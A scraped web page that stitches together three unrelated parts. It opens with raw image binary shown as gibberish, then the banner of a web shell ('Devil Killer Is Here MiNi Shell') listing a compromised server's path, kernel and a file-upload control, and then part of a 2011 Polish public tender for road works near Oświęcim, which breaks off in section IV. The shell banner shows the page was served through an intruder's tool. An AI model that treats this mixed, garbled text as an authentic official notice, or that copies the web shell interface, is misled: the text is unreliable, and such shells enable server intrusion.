JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110128/32145-N-2011.html

<p class="kh_header"><b>Oświęcim: Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku: wg 5 zadań:
1 - Budowa chodnika przy ul. Głównej w Osieku (DP 1758K) od DW 949
2 - Przebudowa  skrzyżowania dróg  Nr 1758K z 1859K  w Osieku w zakresie zmiany organizacji ruchu wraz z remontem ul. Karolina (DP1859K) 
3 - Budowa chodnika przy ul. Kościelnej w Malcu (DP 1859K) wraz z przebudową oświetlenia na skrzyżowaniu dróg  Nr 1859K  z 1862K 
4 - Remont drogi powiatowej Nr 1859K  w  km od   4+530 do  6+010
5-Remont ul. Kolbego w Nowej Wsi  (DP 1859K) wraz z  przebudową oświetlenia</b><br>
<b>Numer ogłoszenia: 32145 - 2011; data zamieszczenia: 28.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Oświęcimiu , ul. Stanisławy Leszczyńskiej 12, 32-600 Oświęcim, woj. małopolskie, tel. 033 8430622, faks 033 8433593.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku: wg 5 zadań:
1 - Budowa chodnika przy ul. Głównej w Osieku (DP 1758K) od DW 949
2 - Przebudowa  skrzyżowania dróg  Nr 1758K z 1859K  w Osieku w zakresie zmiany organizacji ruchu wraz z remontem ul. Karolina (DP1859K) 
3 - Budowa chodnika przy ul. Kościelnej w Malcu (DP 1859K) wraz z przebudową oświetlenia na skrzyżowaniu dróg  Nr 1859K  z 1862K 
4 - Remont drogi powiatowej Nr 1859K  w  km od   4+530 do  6+010
5-Remont ul. Kolbego w Nowej Wsi  (DP 1859K) wraz z  przebudową oświetlenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia są roboty budowlane dla realizacji zadania pn.: 
     Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku: z podziałem na 5 zadań:
Zadanie Nr 1 - Budowa chodnika przy ul. Głównej w Osieku (DP 1758K) od DW 949.
Zadanie Nr 2 - Przebudowa  skrzyżowania dróg powiatowych Nr 1758K z 1859K  w Osieku w zakresie zmiany organizacji ruchu wraz z remontem ul. Karolina (DP1859K). 
Zadanie Nr 3 - Budowa chodnika przy ul. Kościelnej w Malcu (DP 1859K) wraz z przebudową oświetlenia na skrzyżowaniu dróg powiatowych  Nr 1859K  z 1862K .
Zadanie Nr 4 - Remont drogi powiatowej Nr 1859K  w  km od   4+530 do  6+010. 
Zadanie Nr 5 - Remont ul. M.M. Kolbego w Nowej Wsi  (DP 1859K) wraz z przebudową oświetlenia.  
         gdzie  dla:
1)	zadania nr 1 - Budowa chodnika przy ul. Głównej w Osieku (DP 1758K) od DW 949, zakres robót na odcinku o długości 500 m  od skrzyżowania z DW 949 obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - budowę chodnika i kanalizacji deszczowej,
 - budowę peronu przystankowego,
 - wykonanie poszerzenia nawierzchni,
 - montaż systemu oświetlenia aktywnego przejścia dla pieszych,
- roboty wykończeniowe.

2)	zadania nr 2 - Przebudowa  skrzyżowania dróg powiatowych Nr 1758K z 1859K  w Osieku w zakresie zmiany organizacji ruchu wraz z remontem ul. Karolina (DP1859K) zakres robót dla:  
a)	skrzyżowania dróg - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
- zabezpieczenie/ przebudowę infrastruktury obcej,
 - budowę chodnika,
 - budowę skrzyżowania typu rondo,
 - przebudowa oświetlenia ulicznego,
 - przebudowa kanalizacji deszczowej,
 - wykonanie nowej nawierzchni asfaltobetonowej,
 - roboty wykończeniowe.
b)	Ul. Karolina - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
- budowę chodnika na odcinku 570 mb,
- przebudowa kanalizacji deszczowej,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 3240 m2,
 - roboty wykończeniowe, humusowanie.

3)	zadania nr 3 - Budowa chodnika przy ul. Kościelnej w Malcu (DP 1859K) wraz z przebudową oświetlenia na skrzyżowaniu dróg powiatowych  Nr 1859K  z 1862K ,   zakres robót dla: 
a)	Skrzyżowania dróg - obejmuje m.in.:
 - roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - przebudowa oświetlenia ulicznego,
 - roboty wykończeniowe.
b)Ul. Kościelnej w Malcu - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - budowę chodnika na odcinku ok. 650mb,
 - budowa kanalizacji deszczowej na odcinku ok. 530mb,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 3942 m2  wraz z     poszerzeniem jezdni,
 - roboty wykończeniowe, humusowanie.
c)	Zatoki autobusowej - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - budowę zatoki autobusowej,
 - budowę przejścia dla pieszych,  
 - roboty wykończeniowe.

4) zadania nr 4 - Remont  drogi powiatowej Nr 1859K  w  km od   4+530 do  6+010,  zakres robót obejmuje m.in.:
 - roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - poprawa stanu nawierzchni chodnika na powierzchni ok. 450 m2,
 - przebranie rowów na odcinku 2200 mb,
 - naprawa poboczy gruntowych,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 8600 m2 ,
  - roboty wykończeniowe.
5) zadania nr 5 - Remont ul. M.M. Kolbego w Nowej Wsi  (DP 1859K) wraz z przebudową oświetlenia,  zakres robót obejmuje m.in.:
 - roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - frezowanie nawierzchni na powierzchni 1360m2,
 - poprawa stanu technicznego chodników,
 - przebudowa oświetlenia ulicznego,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 1360m2,
 - roboty wykończeniowe.

2.	Szczegółowy opis przedmiotu zamówienia, zakres robót i sposób ich wykonania został określony w przedmiarach  robót, w Specyfikacjach Technicznych Wykonania i Odbioru Robót i dokumentacji projektowej. 
3.	Zadanie inwestycyjne wymienione w pkt.1 będzie dofinansowane w ramach III edycji Narodowego Programu Przebudowy Dróg Lokalnych 2008-2011 .
4.	Wykonawca zobowiązany jest do opracowania i przekazania Zamawiającemu dokumentacji fotograficznej miejsca inwestycji sprzed jej rozpoczęcia, w trakcie robót oraz po zakończeniu robót. Dokumentację fotograficzną należy dostarczyć w wersji elektronicznej w formacie JPG o rozdzielczości min. 3464 x 2312 pixeli (8Mpx) na płycie CD/DVD opatrzoną datą wykonania  i opisem. Miejsca fotografowane (punkty stałe) zostaną ustalone z inwestorem.
5.	Zamawiający dopuszcza składanie ofert częściowych  -  min. jedno z  zadań wymienionych pkt.1.)  Ofertę należy  złożyć w formie pisemnej dla każdego zadania oddzielnie.
6.	Wymagany okres rękojmi i  okres gwarancyjny na roboty budowlane będzie obowiązywał  przez 60 miesięcy z wyłączeniem oznakowania poziomego, na który okres rękojmi i gwarancji wynosi 24 miesiące licząc od daty odbioru końcowego zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje w okresie trzech lat od udzielenia zamówienia podstawowego udzielenia dotychczasowemu wykonawcy, zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, zgodnie z art. 67 ust. 1 pkt 6 ustawy - Prawo zamówień 
 publicznych</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.10.00-8, 45.11.20.00-5, 45.23.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przed upływem terminu składania ofert Wykonawca zobowiązany jest do wniesienia wadium w wysokości:  
a)	dla zadania nr 1 - 10.000 zł,  słownie: dziesięć tysięcy złotych.
b)	dla zadania nr 2 - 10.000 zł,  słownie: dziesięć tysięcy złotych.
c)	dla zadania nr 3 - 10.000 zł,  słownie: dziesięć tysięcy złotych.
d)	dla zadania nr 4 - 10.000 zł, słownie: dziesięć tysięcy złotych,
e)	dla zadania nr 5 -   3.000 zł, słownie: trzy tysiące złotych.
2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt 2 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm).
 3.  Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:  Zarząd Dróg Powiatowych w Oświęcimiu - BANK  SPÓŁDZIELCZY  w Andrychowie Oddział w  Oświęcimiu   Nr konta  44 8123 0000 0012 0229 2000 0040   w takim czasie, aby pieniądze znalazły się na rachunku Zamawiającego najpóźniej przed upływem terminu składania ofert.  W takim przypadku Wykonawca winien zamieścić w  ofercie potwierdzenie dokonania przelewu (terminem wniesienia wadium jest data i godzina zaksięgowania kwoty wadium na koncie Zamawiającego).
4.  Wadium wniesione w innej formie  niż pieniądz należy złożyć  w formie oryginału w pokoju Nr 3   w siedzibie   Zamawiającego, a kserokopię potwierdzoną za zgodność z oryginałem przez osobę  uprawnioną do składania oświadczeń woli w imieniu Wykonawcy  dołączyć do oferty, w przypadku przesłania oferty pocztą lub kurierem oryginał należy złożyć w oddzielnym opakowaniu, a do oferty wpiąć kopię potwierdzoną za zgodność z oryginałem.  
5.  Wniesione wadium musi obejmować cały okres związania ofertą. Wykonawca, którego oferta nie będzie zabezpieczona prawidłowo wniesionym wadium zostanie wykluczony z postępowania. 
6. Zgodnie z art. 46 ust. 4a i ust.5 ustawy Pzp  Zamawiający zatrzyma  wadium  wraz z odsetkami, w przypadku gdy:
a) Wykonawca w odpowiedzi na wezwanie  Zamawiającego, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie, 
b) Wykonawca, którego oferta została wybrana :
      -  odmówi podpisania umowy na   warunkach określonych w ofercie,
    -  nie wniesie wymaganego zabezpieczenia należytego wykonania  umowy,  
           - zawarcie umowy w sprawie niniejszego zamówienia  stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy .
7.  Zamawiający przechowa, a następnie dokona zwrotu lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	W celu potwierdzenia wiedzy i doświadczenia  Wykonawca winien udokumentować, że  zrealizował w okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zamówienie:
a)	dla zadania nr 1 -  w zakresie wykonania robót brukarskich  o wartości min. 300.000 zł brutto,
b)	dla zadania nr 2  - w zakresie robót drogowych  wraz z położeniem nawierzchni asfaltobetonowej jezdni o wartości min. 500.000 zł brutto. 
c)	dla zadania nr 3  - w zakresie  robót drogowych  wraz z położeniem nawierzchni asfaltobetonowej jezdni o wartości min. 500.000 zł brutto. 
d)	dla  zadania nr 4 - w zakresie robót drogowych robót drogowych  wraz z położeniem nawierzchni asfaltobetonowej jezdni o wartości min. 300.000 zł brutto. 
e)	dla zadania nr 5 - w zakresie robót drogowych robót drogowych  wraz z położeniem nawierzchni asfaltobetonowej jezdni o wartości min. 100.000 zł brutto. 
2.	W wykazie należy podać wartości oraz daty i miejsca wykonania oraz załączyć  dokumenty potwierdzające, że roboty  te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
3.	Ocena spełniania wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę dokumenty i oświadczenia na zasadzie spełnia / nie spełnia. Wykonawcy, którzy nie wykażą spełnienia warunku udziału w postępowaniu, podlegać będą wykluczeniu z postępowania.
4.	Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych  innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. W tym celu Wykonawca przedstawi pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie  warunku dotyczącego dysponowania osobami zdolnymi do  wykonywania zamówienia Zamawiający uzna  dysponowanie  osobami  tj.:
 a)  jedną osobą dla każdego zadania, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  drogowej.
      
2.  Do oferty należy dołączyć oświadczenie o osobach wskazanych w ofercie posiadających w/w  uprawnienia budowlane. 
3.	W przypadku wyboru oferty, przed podpisaniem umowy należy przedłożyć Zamawiającemu od wskazanych osób  decyzje o nadaniu uprawnień budowlanych  w specjalności  drogowej oraz aktualne zaświadczenia potwierdzające  przynależność  do właściwej Izby Inżynierów Budownictwa.  
4.	Ocena spełniania wyżej opisanego  warunku  udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę dokumenty i oświadczenia na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej     Zamawiający  uzna, jeżeli wykonawca wykaże:
a)	 posiadanie opłaconej polisy, a w przypadku jej braku inny dokument  
potwierdzający, że Wykonawca jest  ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  500.000 zł.
Ocena spełniania wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę dokumenty i oświadczenia na zasadzie spełnia / nie spełnia. Wykonawcy, którzy nie wykażą spełnienia warunku udziału w postępowaniu, podlegać będą wykluczeniu z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy   zobowiązani są złożyć w ofercie dla każdego zadania oddzielnie oprócz w/w dokumentów poniższe dokumenty i oświadczenia:
1)	Wypełniony i podpisany Formularz oferty  - wg   załącznika Nr 2a,b,c,d,e  do SIWZ.
2)	Formularz oferty wszystkie załączone dokumenty podpisuje osoba reprezentująca Wykonawcę na podstawie wpisu do odpowiedniego rejestru lub ewidencji działalności gospodarczej albo osoba upoważniona przez osobę uprawnioną do reprezentacji. Jeżeli Wykonawcę reprezentuje pełnomocnik do oferty musi być załączone pełnomocnictwo, które w swej treści wskazywać będzie uprawnienie do podpisania oferty. 
3)	Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub kserokopii  potwierdzonej notarialnie.  
4)	W przypadku składania oferty wspólnej przez kilku Wykonawców  np. konsorcjum, wspólnicy spółki cywilnej w formularzu oferty należy wymienić wszystkich Wykonawców występujących wspólnie ze wskazaniem pełnomocnika do  reprezentowania ich w postępowaniu  o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. 
5)	Wykonawca, który jest przedsiębiorcą wpisanym do ewidencji działalności gospodarczej zobowiązany jest do przedstawienia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.
6)	Oświadczenie Wykonawcy, że zadanie będzie wykonane w całości siłami własnymi lub wykaz  zakresu robót przewidziany do powierzenia podwykonawcom  - wg załącznika Nr 7a,b,c,d,e  do SIWZ.
7)	Wzór umowy wg zał. Nr 8a,b,c,d,e do SIWZ  - zaakceptowany przez osobę lub osoby upoważnione do reprezentowania podmiotu  składającego ofertę.
8)	Harmonogram rzeczowo - terminowo - finansowy wg zał. Nr 9a,b,c,d,e  do SIWZ
9)	Kosztorys ofertowy uproszczony w wykazem cen sprzętu, materiałów i z nośnikami cen kosztorysowych sporządzony na podstawie załączonych przedmiarów robót podpisany przez osobę lub osoby upoważnione do reprezentowania podmiotu  składającego ofertę. 
10)	Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
